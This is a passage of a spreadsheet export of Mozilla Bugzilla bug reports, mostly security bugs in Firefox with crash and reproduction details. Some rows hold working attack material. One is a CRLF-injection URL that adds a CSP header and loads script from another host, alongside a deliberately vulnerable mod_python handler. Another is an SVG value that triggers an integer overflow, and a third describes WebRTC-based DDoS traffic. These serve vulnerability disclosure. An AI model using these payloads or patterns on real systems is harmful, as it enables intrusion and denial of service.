    if (strstr(buf, "vfpv3d16"))
        flags |= HWCAP_VFPv3D16;
    if (strstr(buf, "vfpv4"))
        flags |= HWCAP_VFPv4;
    if (strstr(buf, "idiva"))
        flags |= HWCAP_IDIVA;
    if (strstr(buf, "idivt"))
        flags |= HWCAP_IDIVT;
    if (strstr(buf, "neon"))
        flags |= HWCAP_NEON;
    // not part of the HWCAP flag, but I need to know this, and we're not using
    //  that bit, so... I'm using it
    if (strstr(buf, "ARMv7"))
        flags |= HWCAP_ARMv7;
    isSet = true;
    return flags;
#endif
viz.  open /proc/cpuinfo, read arbitrary amount stuff into buf, not
zero terminated, and then do strstr on the buf.  Since in my test case,
the file fits in buf (as one would expect), it winds up doing strstr
on the garbage left over in buf[].  Hence
(1) for the strings that don't appear /proc/cpuinfo (eg, vfpv4), the 
    do/don't-we-have-this-feature result is random, and
(2) if all of the garbage in buf[] doesn't contain a zero byte, we'll
    overrun the array.</t>
        </is>
      </c>
      <c r="X2760" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2761">
      <c r="A2761" t="n">
        <v>863454</v>
      </c>
      <c r="B2761" t="inlineStr">
        <is>
          <t>2013-04-18 14:53:53 -0700</t>
        </is>
      </c>
      <c r="C2761" t="inlineStr">
        <is>
          <t>crash in doInvoke @ XPCCallContext::Init</t>
        </is>
      </c>
      <c r="D2761" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E2761" t="n">
        <v>1</v>
      </c>
      <c r="F2761" t="n">
        <v>1</v>
      </c>
      <c r="G2761" t="n">
        <v>6</v>
      </c>
      <c r="H2761" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2761" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J2761" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K2761" t="inlineStr">
        <is>
          <t>21 Branch</t>
        </is>
      </c>
      <c r="L2761" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2761" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2761" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2761" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2761" t="inlineStr">
        <is>
          <t>[adv-main22+]</t>
        </is>
      </c>
      <c r="Q2761" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2761" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2761" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T2761" t="n">
        <v>1</v>
      </c>
      <c r="U2761" t="n">
        <v>0</v>
      </c>
      <c r="V2761" t="n">
        <v>33</v>
      </c>
      <c r="W2761" t="inlineStr">
        <is>
          <t>Created attachment 739278
Testcase, might hit unrelated plugin crashes on FF &gt;21
This is a dupe of bug 858900, but filing as security sensitive because of the possible use-after-free badness.
While investigating mostly-unrelated plugin bug 859099, I found this test case to reliably trigger 858900.
- Create an iframe
- On the iframe's load, create a plugin. Set a setter on the plugin's &lt;embed&gt; tag.
- In the plugin instantiate (NPP_New) set that property on embed, invoking setter
- Setter removes iframe from document
- js context is destroyed despite us currently running a setter on it
https://crash-stats.mozilla.com/report/index/bp-240c2eeb-bee2-478b-902e-ba01b2130418
Note that this test case might also trigger bug 854082 on firefox 22+ or bug 859099 if OOP plugins is disabled, but seems to reliably trigger this on 21.
On debug builds we hit a JS_ASSERT before crashing, stack attached</t>
        </is>
      </c>
      <c r="X2761" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2762">
      <c r="A2762" t="n">
        <v>717511</v>
      </c>
      <c r="B2762" t="inlineStr">
        <is>
          <t>2012-01-11 20:17:47 -0800</t>
        </is>
      </c>
      <c r="C2762" t="inlineStr">
        <is>
          <t>Bad intersection of injected HTTP headers leads to Content Security Policy (CSP) Bypass</t>
        </is>
      </c>
      <c r="D2762" t="inlineStr">
        <is>
          <t>2012-04-10 21:29:04 -0700</t>
        </is>
      </c>
      <c r="E2762" t="n">
        <v>1</v>
      </c>
      <c r="F2762" t="n">
        <v>1</v>
      </c>
      <c r="G2762" t="n">
        <v>3</v>
      </c>
      <c r="H2762" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2762" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2762" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2762" t="inlineStr">
        <is>
          <t>9 Branch</t>
        </is>
      </c>
      <c r="L2762" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2762" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2762" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2762" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2762" t="inlineStr">
        <is>
          <t>[sg:moderate][qa-]</t>
        </is>
      </c>
      <c r="Q2762" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2762" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2762" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T2762" t="n">
        <v>1</v>
      </c>
      <c r="U2762" t="n">
        <v>0</v>
      </c>
      <c r="V2762" t="n">
        <v>35</v>
      </c>
      <c r="W2762" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Ubuntu; X11; Linux x86_64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Build ID: 20111228084940
Steps to reproduce:
When multiple X-Content-Security-Policy are present they have an additive effect on the policy for that page.  This allows an attacker to introduce a new rule using CRLF injection and obtain XSS.  In the following PoC we are introducing the rule set "allow *" and an HTTP body where we are including alert.js from another domain.  
This poc will not work on your machine because http://sitewatch/alert.js is not accessible to you,  this value will have to be changed.
http://localhsot/crlf.py?url=1%0Ax-content-security-policy:%20allow%20*%0Acontent-length:%2049%0A%0A%3Cscript%20src=%27http://sitewatch/alert.js%27%3E%3C/script%3E
Here is a vulnerable web application where alert(1) does not execute do to the CSP.
from mod_python import apache, util
def handler(req):
    input=util.FieldStorage(req, keep_blank_values=1)
    req.headers_out.add('X-Content-Security-Policy', "default-src 'self'")
    req.headers_out.add('some-header', input.getfirst("url"))
    req.content_type = "text/html"
    req.write("&lt;script&gt;alert(1)&lt;/script&gt;")    
    return apache.OK
Here is a generic apache config to run the mod_python file above:
 &lt;Directory /var/www/&gt;
       AddHandler python-program .py
       PythonHandler crlf
       PythonDebug On
       Options Indexes FollowSymLinks MultiViews
       AllowOverride All
       Order allow,deny
       allow from all
 &lt;/Directory&gt;</t>
        </is>
      </c>
      <c r="X2762" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2763">
      <c r="A2763" t="n">
        <v>1330687</v>
      </c>
      <c r="B2763" t="inlineStr">
        <is>
          <t>2017-01-12 08:30:14 -0800</t>
        </is>
      </c>
      <c r="C2763" t="inlineStr">
        <is>
          <t>More memory corruption issues in nightly build from 01/10/17</t>
        </is>
      </c>
      <c r="D2763" t="inlineStr">
        <is>
          <t>2024-05-30 09:24:54 -0700</t>
        </is>
      </c>
      <c r="E2763" t="n">
        <v>1</v>
      </c>
      <c r="F2763" t="n">
        <v>1</v>
      </c>
      <c r="G2763" t="n">
        <v>3</v>
      </c>
      <c r="H2763" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2763" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2763" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K2763" t="inlineStr">
        <is>
          <t>53 Branch</t>
        </is>
      </c>
      <c r="L2763" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2763" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2763" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2763" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2763" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main52+][adv-esr45.8+]</t>
        </is>
      </c>
      <c r="Q2763" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2763" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2763" t="inlineStr">
        <is>
          <t>mozilla54</t>
        </is>
      </c>
      <c r="T2763" t="n">
        <v>1</v>
      </c>
      <c r="U2763" t="n">
        <v>0</v>
      </c>
      <c r="V2763" t="n">
        <v>39</v>
      </c>
      <c r="W2763" t="inlineStr">
        <is>
          <t>Created attachment 8826218
firefox-possibleUseAfterFree-threadIssue.png
This is even more interesting.  Following a memory corruption crash of a tab involving gfx rendering(which I will follow up on) once the tab(s) were recovered, I left ff setting a minute and came to the attached screenshot.
It's worrisome because not only does it show memory corruption and issues involving threading(see bug 1330173) it also shows what seems be a use after free issue in play.
I have to say this is a major headache because I just triggered the tab crashes for the first time.  Right now I have to try to figure out STR for that and see if it just happens to turn into this again.  Not to mention I'm supposed to doing some work google right now =/
See the attached screenshot for the goods.</t>
        </is>
      </c>
      <c r="X2763" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2764">
      <c r="A2764" t="n">
        <v>71659</v>
      </c>
      <c r="B2764" t="inlineStr">
        <is>
          <t>2001-03-11 21:14:19 -0800</t>
        </is>
      </c>
      <c r="C2764" t="inlineStr">
        <is>
          <t>New bugs do not create email if the reporter doesn't comment</t>
        </is>
      </c>
      <c r="D2764" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:24 -0800</t>
        </is>
      </c>
      <c r="E2764" t="n">
        <v>1</v>
      </c>
      <c r="F2764" t="n">
        <v>1</v>
      </c>
      <c r="G2764" t="n">
        <v>4</v>
      </c>
      <c r="H2764" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2764" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2764" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K2764" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2764" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2764" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2764" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2764" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2764" t="inlineStr"/>
      <c r="Q2764" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2764" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2764" t="inlineStr">
        <is>
          <t>Bugzilla 2.12</t>
        </is>
      </c>
      <c r="T2764" t="n">
        <v>1</v>
      </c>
      <c r="U2764" t="n">
        <v>0</v>
      </c>
      <c r="V2764" t="n">
        <v>24</v>
      </c>
      <c r="W2764" t="inlineStr">
        <is>
          <t>The summary says it all.  If the reporter does not include a long description for 
the bug, no email is sent when the new bug is created.  This happened with bug 
71658 when timeless filed it.</t>
        </is>
      </c>
      <c r="X2764" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2765">
      <c r="A2765" t="n">
        <v>441368</v>
      </c>
      <c r="B2765" t="inlineStr">
        <is>
          <t>2008-06-23 12:12:06 -0700</t>
        </is>
      </c>
      <c r="C2765" t="inlineStr">
        <is>
          <t>Crash [@ nsSVGFEGaussianBlurElement::SetupPredivide] opening SVG file</t>
        </is>
      </c>
      <c r="D2765" t="inlineStr">
        <is>
          <t>2009-01-05 03:30:26 -0800</t>
        </is>
      </c>
      <c r="E2765" t="n">
        <v>1</v>
      </c>
      <c r="F2765" t="n">
        <v>1</v>
      </c>
      <c r="G2765" t="n">
        <v>3</v>
      </c>
      <c r="H2765" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2765" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2765" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K2765" t="inlineStr">
        <is>
          <t>1.9.0 Branch</t>
        </is>
      </c>
      <c r="L2765" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2765" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2765" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2765" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2765" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q2765" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2765" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2765" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2765" t="n">
        <v>1</v>
      </c>
      <c r="U2765" t="n">
        <v>0</v>
      </c>
      <c r="V2765" t="n">
        <v>13</v>
      </c>
      <c r="W2765" t="inlineStr">
        <is>
          <t>Created attachment 326347
testcase crashes trunk
Drew Yao from Apple Product Security reported this crash to security@mo.  The attached testcase crashes trunk on Mac and Linux (haven't tested it on Windows).  I will follow up shortly to attach the stack contents from the Mac crash.
From Drew's email:
Integer overflow in nsSVGFEGaussianBlurElement::SetupPredivide
It does not seem to affect Firefox 2, only Firefox 3.
PRUint8 *
nsSVGFEGaussianBlurElement::SetupPredivide(PRUint32 size) const
{
  PRUint8 *tmp = new PRUint8[size * 256];   // &lt;-- integer overflow possible here, leading to an unexpectedly small buffer, and memory corruption
  if (tmp) {
    for (PRUint32 i = 0; i &lt; 256; i++)
      memset(tmp + i * size, i, size);
  }
  return tmp;
}
To reproduce:
Open the attached 00001596.svg in Firefox 3 in Mac OS X 10.5.3 Intel.
It has the line
&lt;feGaussianBlur in="SourceAlpha" stdDeviation="2147483648" result="blur"/&gt;
Breakpoint 13, nsSVGFEGaussianBlurElement::SetupPredivide (this=0x1c4adaa0, size=2018542109) at /Volumes/data_apps/mozilla/content/svg/content/src/nsSVGFilters.cpp:774
774      PRUint8 *tmp = new PRUint8[size * 256];
(gdb) p size
$1001 = 2018542109
(gdb) p/x size
$1002 = 0x7850821d
(gdb) p/x size * 256
$1003 = 0x50821d00   #smaller than size
Process:         firefox-bin [55069]
Path:            /Volumes/data_apps/obj-i386-apple-darwin9.3.0/dist/MinefieldDebug.app/Contents/MacOS/firefox-bin
Identifier:      org.mozilla.firefox
Version:         3.0pre (3.0pre)
Code Type:       X86 (Native)
Parent Process:  launchd [1]
Date/Time:       2008-06-05 16:25:56.043 -0700
OS Version:      Mac OS X 10.5.3 (9D34)
Report Version:  6
Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x000000006f4eb000
Crashed Thread:  0
Thread 0 Crashed:
0   libSystem.B.dylib                 0xffff06b0 __bzero + 176
1   libgklayout.dylib                 0x129ae722 nsSVGFEGaussianBlurElement::SetupPredivide(unsigned int) const + 72 (nsSVGFilters.cpp:776)
2   libgklayout.dylib                 0x129b5fb3 nsSVGFEGaussianBlurElement::GaussianBlur(unsigned char*, unsigned char*, nsSVGFilterResource*, unsigned int, unsigned int) + 255 (nsSVGFilters.cpp:828)
3   libgklayout.dylib                 0x129c2c63 nsSVGFEGaussianBlurElement::Filter(nsSVGFilterInstance*) + 537 (nsSVGFilters.cpp:896)
4   libgklayout.dylib                 0x1296a831 nsSVGFilterFrame::FilterPaint(nsSVGRenderState*, nsISVGChildFrame*) + 4063 (nsSVGFilterFrame.cpp:513)
5   libgklayout.dylib                 0x1299034a nsSVGUtils::PaintChildWithEffects(nsSVGRenderState*, nsRect*, nsIFrame*) + 698 (nsSVGUtils.cpp:1378)
6   libgklayout.dylib                 0x1297da08 nsSVGOuterSVGFrame::Paint(nsIRenderingContext&amp;, nsRect const&amp;, nsPoint) + 466 (nsSVGOuterSVGFrame.cpp:583)
7   libgklayout.dylib                 0x1297dbc6 nsDisplaySVG::Paint(nsDisplayListBuilder*, nsIRenderingContext*, nsRect const&amp;) + 74 (nsSVGOuterSVGFrame.cpp:466)
8   libgklayout.dylib                 0x122c0b91 nsDisplayList::Paint(nsDisplayListBuilder*, nsIRenderingContext*, nsRect const&amp;) const + 61 (nsDisplayList.cpp:295)
9   libgklayout.dylib                 0x122c1dbb nsDisplayWrapList::Paint(nsDisplayListBuilder*, nsIRenderingContext*, nsRect const&amp;) + 41 (nsDisplayList.cpp:694)
10  libgklayout.dylib                 0x122c2a50 nsDisplayClip::Paint(nsDisplayListBuilder*, nsIRenderingContext*, nsRect const&amp;) + 128 (nsDisplayList.cpp:888)
...</t>
        </is>
      </c>
      <c r="X2765" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2766">
      <c r="A2766" t="n">
        <v>54566</v>
      </c>
      <c r="B2766" t="inlineStr">
        <is>
          <t>2000-09-28 14:47:24 -0700</t>
        </is>
      </c>
      <c r="C2766" t="inlineStr">
        <is>
          <t>Software error generated when adding invalid dependencies</t>
        </is>
      </c>
      <c r="D2766" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:22 -0800</t>
        </is>
      </c>
      <c r="E2766" t="n">
        <v>1</v>
      </c>
      <c r="F2766" t="n">
        <v>1</v>
      </c>
      <c r="G2766" t="n">
        <v>4</v>
      </c>
      <c r="H2766" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2766" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2766" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K2766" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2766" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2766" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2766" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2766" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2766" t="inlineStr">
        <is>
          <t>2.14</t>
        </is>
      </c>
      <c r="Q2766" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2766" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S2766" t="inlineStr">
        <is>
          <t>Bugzilla 2.12</t>
        </is>
      </c>
      <c r="T2766" t="n">
        <v>1</v>
      </c>
      <c r="U2766" t="n">
        <v>0</v>
      </c>
      <c r="V2766" t="n">
        <v>10</v>
      </c>
      <c r="W2766" t="inlineStr">
        <is>
          <t>If you try to make a bug depend on or block an invalid bug id, bugzilla
correctly reports in big bad red and black that the bug id you entered
was invalid.  However, it then generates a software error.  I changed
the die() to a confess() and got this stack trace:
SELECT profiles.userid, profiles.groupset, profiles.login_name,
profiles.login_name = 'aspiers@guideguide.com' AND profiles.cryptpassword =
logincookies.cryptpassword AND logincookies.hostname = '192.168.1.1',
profiles.disabledtext  FROM profiles, logincookies WHERE logincookies.cookie =
'310' AND profiles.userid = logincookies.userid: Table 'logincookies' was not
locked with LOCK TABLES at globals.pl line 140
        main::SendSQL('SELECT profiles.userid, profiles.groupset,
profiles.login_name, ...') called at CGI.pl line 538
        main::quietly_check_login() called at CGI.pl line 909
        main::GetCommandMenu() called at globals.pl line 944
        main::Param('commandmenu') called at globals.pl line 977
        main::PerformSubsts('&amp;lt;TABLE BORDER=&amp;quot;0&amp;quot;&amp;gt;&amp;lt;TR&amp;gt;&amp;lt;TD
BGCOLOR=&amp;quot;#000000&amp;quot; VALIGN=&amp;quot;TOP&amp;quot;&amp;gt;^J&amp;lt;TABLE...') called at
CGI.pl line 812
        main::PutFooter() called at CGI.pl line 821
        main::PuntTryAgain('12345 is not a legal bug number') called at
/nfs-home/stuff/web/bugzilla/process_bug.cgi line 727
Why MySQL was expecting logincookies to be locked, I have no idea ...</t>
        </is>
      </c>
      <c r="X2766" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2767">
      <c r="A2767" t="n">
        <v>684544</v>
      </c>
      <c r="B2767" t="inlineStr">
        <is>
          <t>2011-09-03 16:19:00 -0700</t>
        </is>
      </c>
      <c r="C2767" t="inlineStr">
        <is>
          <t>Crash [@ LocationSetterGuts]</t>
        </is>
      </c>
      <c r="D2767" t="inlineStr">
        <is>
          <t>2011-12-01 14:42:01 -0800</t>
        </is>
      </c>
      <c r="E2767" t="n">
        <v>1</v>
      </c>
      <c r="F2767" t="n">
        <v>1</v>
      </c>
      <c r="G2767" t="n">
        <v>3</v>
      </c>
      <c r="H2767" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2767" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2767" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2767" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2767" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2767" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2767" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2767" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2767" t="inlineStr"/>
      <c r="Q2767" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2767" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2767" t="inlineStr">
        <is>
          <t>mozilla9</t>
        </is>
      </c>
      <c r="T2767" t="n">
        <v>1</v>
      </c>
      <c r="U2767" t="n">
        <v>0</v>
      </c>
      <c r="V2767" t="n">
        <v>10</v>
      </c>
      <c r="W2767" t="inlineStr">
        <is>
          <t>Created attachment 558106
testcase
I'm guessing this is a regression from bug 639720.</t>
        </is>
      </c>
      <c r="X2767" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2768">
      <c r="A2768" t="n">
        <v>1029902</v>
      </c>
      <c r="B2768" t="inlineStr">
        <is>
          <t>2014-06-24 16:45:25 -0700</t>
        </is>
      </c>
      <c r="C2768" t="inlineStr">
        <is>
          <t>[Meta] Homescreen uses a lot more memory in 2.0</t>
        </is>
      </c>
      <c r="D2768" t="inlineStr">
        <is>
          <t>2014-08-10 21:21:36 -0700</t>
        </is>
      </c>
      <c r="E2768" t="n">
        <v>1</v>
      </c>
      <c r="F2768" t="n">
        <v>1</v>
      </c>
      <c r="G2768" t="n">
        <v>6</v>
      </c>
      <c r="H2768" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2768" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J2768" t="inlineStr">
        <is>
          <t>Gaia::Homescreen</t>
        </is>
      </c>
      <c r="K2768" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2768" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2768" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2768" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2768" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2768" t="inlineStr">
        <is>
          <t>[caf priority: p1][MemShrink:P1][c=memory p= s= u=2.0][systemsfe] [CR 690192][7/19]</t>
        </is>
      </c>
      <c r="Q2768" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2768" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2768" t="inlineStr">
        <is>
          <t>2.1 S1 (1aug)</t>
        </is>
      </c>
      <c r="T2768" t="n">
        <v>1</v>
      </c>
      <c r="U2768" t="n">
        <v>0</v>
      </c>
      <c r="V2768" t="n">
        <v>98</v>
      </c>
      <c r="W2768" t="inlineStr">
        <is>
          <t>The memory reports in bug 1028260 show that the homescreen memory usage went up significantly between 1.4 and 2.0.
7,397,376 B (100.0%) -- explicit
├──5,577,888 B (75.40%) ── heap-unclassified</t>
        </is>
      </c>
      <c r="X2768" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2769">
      <c r="A2769" t="n">
        <v>1281482</v>
      </c>
      <c r="B2769" t="inlineStr">
        <is>
          <t>2016-06-22 07:54:32 -0700</t>
        </is>
      </c>
      <c r="C2769" t="inlineStr">
        <is>
          <t>WebRTC can be used to generate a large amount of  UDP traffic for DDOS attacks (when using e10s)</t>
        </is>
      </c>
      <c r="D2769" t="inlineStr">
        <is>
          <t>2017-08-28 13:37:43 -0700</t>
        </is>
      </c>
      <c r="E2769" t="n">
        <v>1</v>
      </c>
      <c r="F2769" t="n">
        <v>1</v>
      </c>
      <c r="G2769" t="n">
        <v>3</v>
      </c>
      <c r="H2769" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2769" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2769" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K2769" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2769" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2769" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2769" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2769" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2769" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main51+]</t>
        </is>
      </c>
      <c r="Q2769" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2769" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2769" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T2769" t="n">
        <v>1</v>
      </c>
      <c r="U2769" t="n">
        <v>0</v>
      </c>
      <c r="V2769" t="n">
        <v>29</v>
      </c>
      <c r="W2769" t="inlineStr">
        <is>
          <t>Created attachment 8764279
stunTraffic.html
1. Create a large number of webkitRTCPeerConnection objects
2. Point the STUN server for ICE at the a the target to DDOS
3. Set them up with to start gathering stun address
A STUN packet is sent every 1 ms. This allows an attacker doing perhaps an add buy and using to have each browser display the add send about 500 kbps of UDP traffic to an IP and port of the attackers choosing and might contribute to a DDOS attack on say DNS servers. 
Currently plan to talk about this at upcoming IETF which has a a draft deadline of July 8 but am happy to work with FF team to change that timing if needed. I am strongly committed to what is good for the WebRTC community do not want to do anything that would have any negative impact on FF.</t>
        </is>
      </c>
      <c r="X2769" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2770">
      <c r="A2770" t="n">
        <v>1254688</v>
      </c>
      <c r="B2770" t="inlineStr">
        <is>
          <t>2016-03-08 13:17:44 -0800</t>
        </is>
      </c>
      <c r="C2770" t="inlineStr">
        <is>
          <t>Resource Timing API is storing resources sent by the previous page.</t>
        </is>
      </c>
      <c r="D2770" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E2770" t="n">
        <v>1</v>
      </c>
      <c r="F2770" t="n">
        <v>1</v>
      </c>
      <c r="G2770" t="n">
        <v>3</v>
      </c>
      <c r="H2770" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2770" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2770" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2770" t="inlineStr">
        <is>
          <t>45 Branch</t>
        </is>
      </c>
      <c r="L2770" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2770" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2770" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2770" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2770" t="inlineStr">
        <is>
          <t>[land tests in July][adv-main48+][adv-esr45.4+] maybe sec-high? btpp-active</t>
        </is>
      </c>
      <c r="Q2770" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2770" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2770" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T2770" t="n">
        <v>1</v>
      </c>
      <c r="U2770" t="n">
        <v>0</v>
      </c>
      <c r="V2770" t="n">
        <v>58</v>
      </c>
      <c r="W2770" t="inlineStr">
        <is>
          <t>Created attachment 8728078
Test pages which reproduce the error
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36
Steps to reproduce:
We've identified an issue with the Resource Timing API, in scenarios in which requests are sent during a navigation from one page to another. Requests sent by the previous page, which were made after the next page starts loading, will appear in the list of resources for the next page. This typically happens if requests are sent during the "onbeforeunload" and "unload" handlers. These resources will appear at the beginning of the array returned by calling:
